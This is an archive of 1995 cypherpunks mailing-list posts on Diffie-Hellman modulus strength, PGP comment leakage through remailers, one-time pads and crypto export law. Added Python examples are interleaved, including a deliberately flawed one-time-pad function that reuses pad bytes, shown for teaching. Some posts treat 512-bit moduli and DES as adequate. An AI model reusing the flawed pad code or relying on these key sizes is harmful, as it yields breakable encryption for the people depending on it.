Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Wed, 8 Nov 1995 10:07:19 +0800
To: bal@martigny.ai.mit.edu
Subject: Re: Photuris Primality verification needed
In-Reply-To: <1999.bsimpson@morningstar.com>
Message-ID: <199511080143.RAA22564@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


> Our practical experiences with discrete logs suggests that the effort
> required to perform the discrete log precomputations in (a) is slightly
> more difficult than factoring a composite of the same size in bits.  In
> 1990-91 we estimated that performing (a) for a k-bit prime modulus was
> about as hard as factoring a k+32-bit composite.  [Recent factoring work
> has probably changed this a bit, but it's still a good estimate.]

This is also my understanding, which I got from you in the first
place.  I take it there have been no dramatic breakthroughs in the
last few years in the discrete log problem? How heavily has it been
studied in comparison with factoring?

Yes, in theory once an attacker spends enough time precomputing a
table for a particular modulus he can then attack individual DH key
exchanges with ease. This seems entirely analogous to attacking
RSA. If you spend the time up front to factor my public RSA key, then
you can also easily attack individual messages to me.

So if I am willing to rely on a PGP key of, say, 1024 bits then I
should be equally willing to rely on a 1024-bit DH modulus.

Now there is admittedly a practical difference here -- people *can*
change their PGP RSA keys occasionally, though this is hard to do when
you have a lot of signatures.  And each user has his/her own PGP RSA
key, and cracking that gives you only the traffic to that user.  A
public DH modulus will be shared by many more people -- making it a
much more tempting target.

Still, requiring support of a fixed modulus for shared public use is
important to promote a basic level of interoperability. This has its
risks, but it should be okay *provided* it's a strong prime of
sufficient strength to preclude the precomputation of the discrete log
tables by even a highly motivated and resourceful attacker. And as a
backup the protocol should provide for the optional use of private
moduli between consenting parties. Sound reasonable?

Phil
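
The verification this message asks of a shared modulus, as an added example that is not part of the original post or of the Photuris specification. It reads "strong prime" as a safe prime p = 2q + 1 (an assumption); the function names and the toy modulus 23 are constructed for illustration.

```python
import secrets

_SMALL_PRIMES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)


def is_probable_prime(n, rounds=40):
    """Miller-Rabin with random bases; a composite passes with probability <= 4**-rounds."""
    if n < 2:
        return False
    for sp in _SMALL_PRIMES:          # cheap trial division first
        if n % sp == 0:
            return n == sp
    d, s = n - 1, 0                   # write n - 1 as d * 2**s with d odd
    while d % 2 == 0:
        d, s = d // 2, s + 1
    for _ in range(rounds):
        a = secrets.randbelow(n - 3) + 2      # unpredictable base in [2, n-2]
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False              # a is a witness: n is composite
    return True


def check_dh_modulus(p, g, min_bits=1024):
    """Vet a proposed fixed modulus and generator before trusting them."""
    problems = []
    if p.bit_length() < min_bits:
        problems.append(f"modulus is {p.bit_length()} bits, below the {min_bits}-bit floor")
    q = (p - 1) // 2
    p_ok = is_probable_prime(p)
    q_ok = p_ok and is_probable_prime(q)
    if not p_ok:
        problems.append("p is not prime")
    elif not q_ok:
        problems.append("(p-1)/2 is not prime")
    g_ok = 1 < g < p - 1
    if not g_ok:
        problems.append("generator outside 2..p-2")
    order = None
    if q_ok and g_ok:
        # In a safe-prime group every element except 1 and p-1 has order q or 2q.
        order = q if pow(g, q, p) == 1 else 2 * q
    return {"ok": not problems, "problems": problems, "generator_order": order}


def validate_public_value(y, p):
    """Reject 0, 1 and p-1, which would force the shared secret to a known value."""
    return 1 < y < p - 1


def generate_safe_prime(bits):
    """Make a private modulus for parties who prefer not to use the shared one."""
    while True:
        q = secrets.randbits(bits - 1) | (1 << (bits - 2)) | 1
        p = 2 * q + 1
        if is_probable_prime(q) and is_probable_prime(p):
            return p


def agree(p, g):
    """One exchange between two parties, each validating what it receives."""
    q = (p - 1) // 2
    a = secrets.randbelow(q - 1) + 1          # private exponents in [1, q-1]
    b = secrets.randbelow(q - 1) + 1
    ya, yb = pow(g, a, p), pow(g, b, p)
    if not (validate_public_value(ya, p) and validate_public_value(yb, p)):
        raise ValueError("degenerate public value")
    return pow(yb, a, p), pow(ya, b, p)


if __name__ == "__main__":
    # Constructed toy modulus; real use needs min_bits at its default or higher.
    print(check_dh_modulus(23, 2, min_bits=5))
    # A Mersenne prime is prime but not a safe prime, so it is rejected.
    print(check_dh_modulus(2**127 - 1, 2, min_bits=127))
    private_p = generate_safe_prime(64)
    print(hex(private_p), check_dh_modulus(private_p, 2, min_bits=64)["ok"])
```
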







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Wed, 8 Nov 1995 10:07:27 +0800
To: bsimpson@morningstar.com
Subject: Re: Photuris Primality verification needed
In-Reply-To: <1999.bsimpson@morningstar.com>
Message-ID: <199511080146.RAA22568@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


>Hilarie Orman posted that 512-bits only gives an order of 56-bits
>strength, 1024-bits yields 80-bits strength, and 2048 yields 112-bits
>strength.  I do not have the facilities to verify her numbers.

>As most of us agree that 56-bits is not enough (DES), the 512-bit prime
>seems a waste of time and a tempting target.  I'd like to drop it, but
>Phil is inclined to keep it with a disclaimer.

Well, since we already require 56-bit DES in ESP in the interests of
promoting basic interoperability, wouldn't a 512-bit prime be
similarly sufficient?

Again, I'm *not* going to recommend that people use it, only provide it
for those who simply cannot use larger moduli for whatever reason (export
controls or CPU limits).

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Wed, 8 Nov 1995 07:28:57 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again
In-Reply-To: <199511062222.RAA14762@yakko.cs.wmich.edu>
Message-ID: <199511072307.SAA10176@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


frogfarm@yakko.cs.wmich.edu writes:
[re: http://dejanews.com]
> Having said that, I'm greatly looking forward to the impending addition
> of the alt.* groups to their archives. Everyone is indeed a Kibo now,
> and the general public has become more aware of the need for reputations
> as a result.

They now have some alt.*. They've got my rmgroup of 
alt.wild.sex.with.cute.nonAIDSinfected.interesting.sonsofbitches, which 
suggests they've done a pretty thorough job for some time period.

As others have noted, this has clearly been coming for a long time. 
Pseudonymous accounts like Community Connexion's are a partial solution. But
I expect an expansion of the market for strongly pseudonymous mail aliases,
providing fewer services for cheaper rates. It's not enough just to separate 
your True Name (verinym) from your name on the net. Many will want to use 
tentacles (*), er, separate pseudonyms for discussions in different parts of 
the net. After all, I might not want the c'punks to hear about my past life as
a control freak (pun intended) in alt.config. Just a reminder....

-L. Futplex McCarthy  Remailer Feedback Page: 
                      http://www.cs.umass.edu/~lmccarth/remailers/feedback.html

(*) Speaking of tentacles, Dejanews reveals that my name is on the long list
of people whose signatures have been appropriated by Detweiler ;)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Whitaker <whitaker@sover.net>
Date: Wed, 8 Nov 1995 08:20:37 +0800
To: droelke@spirit.aud.alcatel.com (Daniel R. Oelke)
Subject: Re: toolkits?
Message-ID: <199511072351.SAA03354@maple.sover.net>
MIME-Version: 1.0
Content-Type: text/plain


Thanks, Daniel, for a thoughtful response.

At 08:18 AM 11/7/95 CST, Daniel R. Oelke wrote:

>First off - avoid trying to legislate minute details of any encryption
>or signature scheme.  Bureaucrats trying to understand, much less control
>technical things is doomed to fail.  (take GOSIP as a prime example)
>

I didn't mean to suggest that government would be responsible to get it right.
It is possible to show them how it's done though.


>Second - push for legal acceptance of digital signatures and
>acceptance of privacy through encryption.  I believe Utah has taken a strong 
>step in this direction.  Most people, businesses, and courts won't accept
>digital contracts and the like until there is more of a sound
>set of laws behind them.  

This is good as it can be pitched as economic development. Any good models?
Where to find the UTAH language? Pitfalls to watch out for?

>Strong laws against government snooping or
>against anti-encryption or anti-anonymous laws are a good thing IMO.

This will probably be tough in the current environment. Again, any good
language available? Fortunately Vermont is small enough where anyone can get
a bill printed and introduced if it is properly drafted.

What did the recent US Supreme court decide in support of anonymity?

>
>Third - provide services to the citizenry.  For example - provide
>a public key server.  Or how about a digital time-stamping service.
>If the crap was kept out of these services, and they were free for
>anyone to use, then it would advance the idea of encouraging people to
>use crypto in their daily lives.
>

Now we're getting specific. These are things that us ordinary folk can do
which show the 'leaders' how to follow. What software, hardware,
applications, support and sysadmin experience is required and where is it
available on what terms? What are the cash flow opportunities to support
such services?

>Warning - Although I think there are some good things that governments
>can do, it is also very important to watch out for "sabotage" by 
>the government.  Governments tend to like control too much and by
>trying to maintain control, reverse a useful service to one that
>is a dis-service to the people.  In general, if governments get
>out of the way, people will take care of problems themselves.
>

Agreed. That's why after five or six years of trying to get the privacy laws
passed, and watching government drag anchor, I started fishin the
cypherpunks list for some pragmatic solutions to everyday situations.

I'd still like to be pointed to some toolkits/reference works which will
teach me how to access and use available information (or data) to map the
net performance, message paths, transmission delay times, sniffers active, etc.

-sw





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 8 Nov 1995 11:28:16 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again
Message-ID: <199511080306.TAA10540@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Nov 1995 lmccarth@cs.umass.edu wrote:

> your True Name (verinym) from your name on the net. 
> Many will want to use 
> tentacles (*), er, separate pseudonyms for discussions in different parts of 
> the net. After all, I might not want the c'punks to hear about my past life
> as a control freak (pun intended) in alt.config. Just a reminder....
> 

> (*) Speaking of tentacles, Dejanews reveals that my name is on the long list
> of people whose signatures have been appropriated by Detweiler ;)

You too, eh??

I wish that Detweiler could (seriously) go back to wherever he came from. 
Hopefully this time, he can make the attempt ... backwards. 

I no longer become incensed at his type of spoofing.  I understand that a
message may look like it appears to come from a site, but it in fact
doesn't.  Who really knows??  

Even a message that is PGP signed isn't guaranteed to be from the person
who apparently signed it.  Someone might have a web server that asks
Netscape Navigator (very politely) to send out someone's secret PGP keyring,
or asks Navigator to monitor a person's keystrokes when they enter their
password, or heaven forbid their electronic daytimer.

Once you have that, it's easy to send a forged PGP SIGNED email.  Even 
worse, most readers of email will tend to believe that an electronic 
signature is prima facie evidence that a message is from who it 
appears to be from.

It just doesn't work that way.  

You have to look at the message and use "fuzzy" logic to determine how
probable it is that a given message is from the person who it represents
itself as coming from.  And sometimes, you'll be wrong.

Just like the good old, "Dr. Frederick B. Cohen", who posted to this list. 

Is he really the Dr. Cohen, noted international computer virus expert, the
very man who coined the term "computer virus", or isn't he?  Is he the man
who the US military approached to verify whether missile guidance systems
could be compromised by a foreign power utilizing a trojan horse or virus,
or not.  Do we believe his web page?? 

Even if we do, do we place a greater degree of trust in his words, than
that of say, yours truly, Alice de 'nonymous, or of someone who claims to 
be Tim May when they BOTH say that there are very serious flaws and 
deficiencies in the Netscape Navigator product?  Or do we infer that a 
"no comment" coming from AT&T and Netscape, acts as confirmation that 
the *information* in the post is reliably correct.

It's impossible to say with certainty.

Maybe if someone on this mailing list attended Dr. Cohen's talk today at 
the Hilton Hotel, in Washington, D.C., and fills us in with what he said, 
(if we can trust _that_ poster) and we independently verify for ourselves
whether what _he_ (Dr. Cohen or Mr. Confirmation) is saying *seems* to be
reasonable, then we _might_ be able to say that we _may_ be reasonably
certain, that we DO have an international celebrity amongst us and posting
to this list, and notifying the world of a serious problem.

I mean what would you expect, a Press Release??



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 10 Nov 1995 15:41:48 +0800
To: djw@pdcorp.com
Subject: Re: Exporting software doesn't mean exporting
In-Reply-To: <199511080054.QAA29419@email.pdcorp.com>
Message-ID: <199511080135.UAA05624@homeport.org>
MIME-Version: 1.0
Content-Type: text


Dan Weinstein wrote:

| What U.S. law says and what U.S. officials can enforce are two
| different things.  You are in violation of ITAR if you send crypto
| software from Mexico to Europe over the INTERNET if it is routed
| through the U.S..  Think of it like drugs being shipped through the
| U.S., the drug lord that sent it through is just as guilty under U.S.

	It's worth noting that IP is a packet routing system.  It does
not use paths or virtual circuits, like ATM or X.25.  This means that
it is not always possible to predict what route packets will follow.
This is especially true of non-interactive protocols like SMTP.  I can
traceroute to get a good idea of where my ftp packets are going right
now, but between the time I do the traceroute, send a mail message,
and it actually gets transmitted, a router somewhere along my old path
might have died, and my packets, unbeknownst to me, are taking a new
path.

	Thus, if the user in Italy has no reason to expect that their
mail to Germany will traverse the US, then I suspect that the US would
have a hard time proving any criminal act.  Doesn't a criminal act
require intent of some type?  If IP routing, in conjunction with SMTP,
beyond the control of the users, ships packets through the US, I have
a hard time believing that that makes those users criminals.


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 8 Nov 1995 23:52:25 +0800
To: cypherpunks@toad.com
Subject: Re: Newt on Crypto
Message-ID: <199511080454.UAA08566@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>From John Young's posting CYB_lip of a column from the Washington Post

>   "At some point in the not-very-distant future," said
>   Speaker Newt Gingrich (R-Ga.) in an August interview in
>   Wired with computer guru Esther Dyson, "somebody is going
>   to have encryption you can't break.... Governments are not
>   going to be able to stop it."

Newt's an optimist (from the government perspective.)
At some point in the not-very-distant future, 
_everybody_ is going to have encryption the government can't break!


#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 8 Nov 1995 13:21:55 +0800
To: cypherpunks@toad.com
Subject: PGP Comment feature weakens remailer security
Message-ID: <199511080454.UAA05765@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Suppose you want to mail or post something sensitive enough
to chain through several remailers with PGP encryption at every stage
to protect the privacy of communications.  PGP can bite you.
The PGP comment feature lets you stick one (or more?) lines of comment
into your encrypted messages, after the Version: line but before the
encrypted message body.  If you use the PGP comment feature to say something
more or less unique (mine says that you can get PGP outside the country
from ftp.ox.ac.uk), anybody eavesdropping the last remailer in your chain
can notice this in the remailer's input and recognize that it's from you,
even though you've chained through six different places to get there.
It's still encrypted, and protected to the extent that the remailer protects
you, but if the remailer is corrupt or your message can be identified 
by size among the other remailer inputs, you're hosed.

So, for safety, either turn off PGP comments before using it 
with remailers, or wipe out the comments by hand  before each layer of encryption
(easy to do with GUI-based systems like Private Idaho; I don't know
if premail lets you do this or not.)

                                      Bill Stewart

-----BEGIN PGP SIGNATURE-----
Version: 2.7.1
Comment: PGP available outside U.S.A. at ftp.ox.ac.uk

iQBVAwUBMKAgw/thU5e7emAFAQFStwH/QnIiiaeSmUp1YynDBLVo3HAWsVkS0nx8
Fc95Mr0YJ/YIoRDz+xuNgLHbjJZSTUbhOnigMRb7JLNqhmCGvS5RBQ==
=ZWhB
-----END PGP SIGNATURE-----

#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
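
An added example, not part of the original post and not code from PGP, Private Idaho or premail: one way to wipe armor headers from each layer before it goes into the next remailer hop, and to check whether a message would still stand out in a batch. The function names and the base64 bodies are constructed; whether the receiving PGP build accepts armor with no Version: line is an assumption to test before dropping it.

```python
import re
from collections import defaultdict

# "-----BEGIN PGP MESSAGE-----", "-----BEGIN PGP SIGNATURE-----", ...
BEGIN_RE = re.compile(r"^-----BEGIN PGP [A-Z0-9 ,/]+-----\s*$")
# An armor header is a "Key: value" line directly under a BEGIN line.
HEADER_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*): ?(.*)$")


def _walk(text):
    """Yield (line, key, value); key is None unless the line is an armor header."""
    in_headers = False
    for line in text.splitlines():
        if BEGIN_RE.match(line):
            in_headers = True
        elif in_headers:
            m = HEADER_RE.match(line)
            if m:
                yield line, m.group(1), m.group(2).strip()
                continue
            in_headers = False  # the blank line ends the header section
        yield line, None, None


def armor_headers(text):
    """List the (key, value) armor headers an eavesdropper can read in the clear."""
    return [(k, v) for _, k, v in _walk(text) if k is not None]


def strip_armor_headers(text, drop=("Comment",)):
    """Remove the named armor headers; the body, CRC line and message text are untouched."""
    drop = {k.lower() for k in drop}
    kept = [line for line, k, _ in _walk(text) if k is None or k.lower() not in drop]
    return "\n".join(kept) + ("\n" if text.endswith("\n") else "")


def standouts(batch):
    """Indices of messages whose armor-header set is unique within the batch."""
    groups = defaultdict(list)
    for i, msg in enumerate(batch):
        groups[tuple(armor_headers(msg))].append(i)
    return sorted(ix[0] for ix in groups.values() if len(ix) == 1)


# Constructed samples: header values are the ones quoted on this page,
# the base64 bodies are filler and do not decode to real PGP packets.
SAMPLE = """\
-----BEGIN PGP MESSAGE-----
Version: 2.7.1
Comment: PGP available outside U.S.A. at ftp.ox.ac.uk

Y29uc3RydWN0ZWQgc2FtcGxlIGJvZHksIG5vdCBhIHJlYWwgUEdQIHBhY2tldA==
=AAAA
-----END PGP MESSAGE-----
"""

OTHER = """\
-----BEGIN PGP MESSAGE-----
Version: 2.6.2

YW5vdGhlciBjb25zdHJ1Y3RlZCBib2R5IGZyb20gYSBkaWZmZXJlbnQgdXNlcg==
=AAAA
-----END PGP MESSAGE-----
"""

CLEARSIGNED = """\
-----BEGIN PGP SIGNED MESSAGE-----

Comment: this line is message text, not an armor header
-----BEGIN PGP SIGNATURE-----
Version: 2.7.1
Comment: PGP available outside U.S.A. at ftp.ox.ac.uk

Y29uc3RydWN0ZWQgc2lnbmF0dXJlIGZpbGxlcg==
=AAAA
-----END PGP SIGNATURE-----
"""

BATCH = [OTHER, OTHER, SAMPLE]  # what one remailer's input might look like

if __name__ == "__main__":
    print(armor_headers(SAMPLE))
    print(strip_armor_headers(SAMPLE), end="")
    print("stand out before:", standouts(BATCH))
    print("stand out after :",
          standouts([strip_armor_headers(m, drop=("Comment", "Version")) for m in BATCH]))
```

Armor headers sit outside both the signed data and the armor checksum, so removing them does not invalidate the message. Dropping only Comment: still leaves the sample identifiable here, because its Version: line differs from the rest of the batch.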





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 8 Nov 1995 13:07:01 +0800
To: cypherpunks@toad.com
Subject: Re: using pgp to make an otp
Message-ID: <199511080454.UAA08618@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:31 PM 11/6/95 EST, Derek Atkins <warlord@MIT.EDU> wrote:
>> 	PGP output is not random enough to be used for a one time pad.
>> The security of a OTP is *entirely* based on the quality of the random
>> numbers; they should come from some strong generator.  Building good
>> one time pads is tough, and usually not worth the effort.
>
>No, however the output of "pgp +makerandom=XXX filename.dat" _IS_
>random enough for an OTP.  The problem then becomes distributing this
>data.

amp had written:
| my point here is that _if_ pgp output is random enough, i wouldn't need
| hardware. even i, with my extremely limited programming skills could create
| a .cmd file or program that could be used as input for a stream cypher.

The output of PGP should be random enough for your application,
as long as you don't think you're getting a cryptographically-correct OTP
out of the deal.  PGP uses its randpool stuff in its random number generation,
so there are likely to be at least 24 bytes of real randomness kept around, 
maybe more depending on the size of your randpool, but the rest of
your security comes from algorithm quality and is theoretically crackable
like any pseudo-random sequence (albeit requiring exponentially-large
crackwork.)
It's using IDEA in a feedback mode, so it's better than just repeated MD5s.

The output of PGP +makerandom probably is secure enough for most applications,
depending on how many bits you're using, what you're doing with it,
and how paranoid you need to be.  Check out the code to be sure.
You may have special applications such as amp's stream cypher
for which it's more convenient to XOR the makerandom instead of using PGP,
but watch out for attacks like known-plaintext, which can really bite you
in secure-voice systems where there's a lot of near-silence.
Careless protocol work can spoil really decent random numbers....
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
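
An added example, not part of the original post: one instance of the "careless protocol work" warned about above, assuming the carelessness is restarting the pad for every frame and assuming the codec emits an all-zero frame for silence. The frame size, names and data are constructed; the pad here comes from Python's `secrets` module, not from `pgp +makerandom`.

```python
import secrets

FRAME = 16                  # bytes per voice frame (constructed size)
SILENCE = bytes(FRAME)      # assumption: silence encodes as all zero bytes
SPEECH = b"constructed-data"  # stands in for one frame of real speech


def xor(a, b):
    if len(a) != len(b):
        raise ValueError("length mismatch")
    return bytes(x ^ y for x, y in zip(a, b))


class PadCursor:
    """Hands out each pad byte at most once and never wraps around."""

    def __init__(self, pad):
        self._pad, self._pos = pad, 0

    def take(self, n):
        if self._pos + n > len(self._pad):
            raise RuntimeError("pad exhausted: refusing to reuse bytes")
        chunk = self._pad[self._pos:self._pos + n]
        self._pos += n
        return chunk


def encrypt_careless(frames, pad):
    # Flawed on purpose: every frame is XORed with the same pad prefix.
    return [xor(f, pad[:len(f)]) for f in frames]


def encrypt_with_cursor(frames, pad):
    # Each frame consumes fresh pad; XOR is its own inverse, so this also decrypts.
    cur = PadCursor(pad)
    return [xor(f, cur.take(len(f))) for f in frames]


def what_silence_reveals(ct_silence, ct_other):
    """What someone who knows one frame was silence learns about another frame."""
    keystream = xor(ct_silence, SILENCE)   # known plaintext gives up the keystream
    return xor(ct_other, keystream)


if __name__ == "__main__":
    pad = secrets.token_bytes(4 * FRAME)
    frames = [SILENCE, SPEECH]
    bad = encrypt_careless(frames, pad)
    good = encrypt_with_cursor(frames, pad)
    print("careless :", what_silence_reveals(bad[0], bad[1]))
    print("cursor   :", what_silence_reveals(good[0], good[1]))
```

With the cursor, the known silent frame exposes only the pad bytes spent on that frame, which are never used again.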





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Murray <mark@grondar.za>
Date: Wed, 8 Nov 1995 04:37:15 +0800
To: perry@piermont.com
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <199511071907.VAA01462@grumble.grondar.za>
MIME-Version: 1.0
Content-Type: text/plain


> 
> "Peter D. Junger" writes:
> > : Where the hell did you get that idea? [that the ITAR applies to
> > : foreigners abroad].
> > 
> > >From Section 120.17 of the ITAR which provides:
> > 
> >  _Export_ means:
> > 
> >  . . . .
> > 
> >  (4) Disclosing (including oral or visual disclosure) or transferring
> >  technical data to a foreign person, whether in the United States or
> >  abroad . . . .

Hmm. Not only is this law unenforceable, it is unenforced. Anyone,
non-US or otherwise can buy crypto books - you just can't get the code
on floppy. Bruce Schneier went through this procedure when he CJ'ed
"Applied Cryptography".

\begin{lighter_note}
The illegal bit about (for instance) the munitions T-shirt is that it
has a bar code. _This_ makes it illegal for export, because not only is
it machine washable, it is machine readable.
\end{lighter_note}

Academic exchange of mathematical knowledge has never been under scrutiny.

"Technical data" will have to be interpreted to mean something different,
like details of the inner workings of military encryption equipment and the
like.

M

--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grumble.grondar.za for PGP key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Murray <mark@grondar.za>
Date: Wed, 8 Nov 1995 04:49:03 +0800
To: perry@piermont.com
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <199511071925.VAA01520@grumble.grondar.za>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Mark Murray writes:
> > Hmm. Not only is this law unenforceable, it is unenforced. Anyone,
> > non-US or otherwise can buy crypto books - you just can't get the code
> > on floppy. Bruce Schneier went through this procedure when he CJ'ed
> > "Applied Cryptography".
> 
> To my knowledge, Bruce Schneier never CJ'ed "Applied
> Cryptography". Phil Karn did that.

Point is, it got CJ'ed, and easily too. In fact I understand that the
process was 'trivial'. Just the software on floppy was a problem.

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grumble.grondar.za for PGP key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 8 Nov 1995 11:04:18 +0800
To: cypherpunks@toad.com
Subject: Re: So much for free speech...
Message-ID: <199511080238.VAA29423@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:57 AM 11/6/95 -0800, Timothy C. May wrote:
>Children are usually not accorded full constitutional protections,
>especially not in public schools, but this does not mean the police should
>arrest those who utter the wrong words! (Maybe suspending the student,
>though I certainly wouldn't do that.)

That's the rub.  Kids can be kept locked up even with no crime.  "Children
don't have a right to liberty only a right to custody."  An adult would
probably not get arrested in the same circumstances (cops have more
discretion to push kids around) or if arrested not prosecuted, or if
prosecuted, case dismissed.  

It's a good thing the kid didn't engage in racist/Nazi acts like cutting
government spending and taxes or they would have thrown the book at him.

>This is the "safe and secure" world we are in, where bad thoughts and bad
>words are punished. Or threatened with lawsuits. Anarchy seems infinitely
>preferable to me.

You got that right.

DCF

"Remind me to use an anonymous remailer in the future when indulging in racism."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 8 Nov 1995 11:21:40 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again--a URL for Usenet Searching
Message-ID: <199511080238.VAA29437@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:28 PM 11/6/95 -0800, Timothy C. May wrote:
>
>I usually avoid passing on URLs of interesting sites, in the name of
>conserving bandwidth (*), but this one really has me jazzed:
>
>http://dejanews.com/
>
>It allows searching of Usenet archives (a few months' worth, from what I
>can see).

I'm not impressed since I've been using the subscription version of Infoseek
for a while now which lets you search the last month of News and includes
mailing lists as well (including cypherpunks).  The free version is behind
the Net Search button on Netscape but only searches the Web.

http://www.infoseek.com

A search for tcmay@got.net produced more than 200 hits.  My Tim you *do* get
around.  Modesty prevents me from mentioning any newsgroup names.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Katy Kislitzin <ktk@anemone.corp.sgi.com>
Date: Wed, 8 Nov 1995 14:01:21 +0800
To: cypherpunks@toad.com
Subject: EARLY WARNING: Decemeber SF Bay Area Cyperpunks
Message-ID: <199511080549.VAA04978@anemone.corp.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi--

Eric Messick and I will be holding the December C'punks meeting at
our geodesic dome in the Santa Cruz Mountains.  It will be a
combination meeting and holiday get-together.  It will be happening on
the usual c'punks saturday, Dec 9, but will start at 4:00 pm instead
of the usual noon.  A more spirited announcement will follow closer to
the date.

--kt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 10 Nov 1995 05:11:02 +0800
To: cypherpunks@toad.com
Subject: Re: Newt on Crypto
Message-ID: <199511080642.WAA04054@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Nov 1995, Bill Stewart wrote:

> >From John Young's posting CYB_lip of a column from the Washington Post
> 
> >   "At some point in the not-very-distant future," said
> >   Speaker Newt Gingrich (R-Ga.) in an August interview in
> >   Wired with computer guru Esther Dyson, "somebody is going
> >   to have encryption you can't break.... Governments are not
> >   going to be able to stop it."
> 
> Newt's an optimist (from the government perspective.)
> At some point in the not-very-distant future, 
> _everybody_ is going to have encryption the government can't break!

Obviously, Newt missed a briefing somewhere.  His comments leave the
impression that -- in the recent past and even at present -- we only had
encryption which Governments could break.  This is nonsense. 

We've always had encryption which the government couldn't break.  We've
had it in the past.  We have it at present.  And we will have it in the
future. 

We've always had "non-breakable" private communication. 

A simple example.  If I was negotiating at a table with my legal team
around me, and the opposing team across from me, and I wanted to send a
message to my team that is for their eyes only, all I have to do is write
something on the writing pad in front of me, and I have a secure
communications channel to them. 

I can even write it in plain text. 

My team sees it, while the other team doesn't.  This _really_ should not 
surprise anyone ... especially Newt. 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@pdcorp.com (Dan Weinstein)
Date: Wed, 8 Nov 1995 09:18:39 +0800
To: Oliver Huf <ohuf@relay.sedat.de>
Subject: Re: Exporting software doesn't mean exporting
In-Reply-To: <Pine.NXT.3.91.951107144209.255A-100000@oe1>
Message-ID: <199511080054.QAA29419@email.pdcorp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Nov 1995 14:52:33 +0100 (GMT+0100), you wrote:

>
>
>On Tue, 7 Nov 1995, Peter D. Junger wrote:
>
>> >From Section 120.17 of the ITAR which provides:
>> 
>>  _Export_ means:
>>  . . . .
>>  (4) Disclosing (including oral or visual disclosure) or transferring
>>  technical data to a foreign person, whether in the United States or
>>  abroad . . . .
>
>The ITAR is U.S.-Law. This only applies (by definition) to US-citizens
>or persons in the U.S.!
>
>I think it's a common mistake of many Americans that they believe
>creating law means creating law for the whole world!

What U.S. law says and what U.S. officials can enforce are two
different things.  You are in violation of ITAR if you send crypto
software from Mexico to Europe over the INTERNET if it is routed
through the U.S..  Think of it like drugs being shipped through the
U.S., the drug lord that sent it through is just as guilty under U.S.
law as the mule that is carrying it.  The problem is that ITAR was not
